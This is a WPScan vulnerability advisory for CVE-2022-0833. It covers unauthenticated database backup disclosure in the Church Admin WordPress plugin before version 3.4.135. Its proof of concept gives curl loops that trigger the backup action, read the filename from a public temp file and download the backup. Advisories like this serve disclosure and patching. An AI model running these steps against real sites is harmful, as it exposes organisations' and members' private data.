WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Church Admin < 3.4.135 - Unauthenticated Plugin's Backup Disclosure

Description

The plugin does not have authorisation and CSRF in some of its action as well as requested files, allowing unauthenticated attackers to repeatedly request the "refresh-backup" action, and simultaneously keep requesting a publicly accessible temporary file generated by the plugin in order to disclose the final backup filename, which can then be fetched by the attacker to download the backup of the plugin's DB data

Proof of Concept

1. In one terminal, continuously fetch from http://127.0.0.1:8080/?action=refresh-backup:

while true; do curl -s 'http://127.0.0.1:8080/?action=refresh-backup' >/dev/null; done

2. In a second terminal, continuously fetch from /wp-content/uploads/church-admin-cache/temp.sql

while true; do curl -s http://127.0.0.1:8080/wp-content/uploads/church-admin-cache/temp.sql | grep '\.sql\.gz'; done

3. After a while, the backup filename should be found by the curl | grep
   command (second terminal), once found, abort the command in terminal one first,
   then the one in the second terminal - use the last output of the second terminal as the filename (<md5-hash>.sql.gz).

4. Download the backup by accessing it via http://127.0.0.1:8080/wp-content/uploads/church-admin-cache/<extracted-md5-hash>.sql.gz 

Affects Plugins

church-admin
Fixed in version 3.4.135

References

CVE
CVE-2022-0833

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
b2c7c1e8-d72c-4b1e-b5cb-dc2a6538965d

Timeline

Publicly Published

2022-03-07 (about 3 months ago)

Added

2022-03-07 (about 3 months ago)

Last Updated

2022-04-08 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceDisclosure policy
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us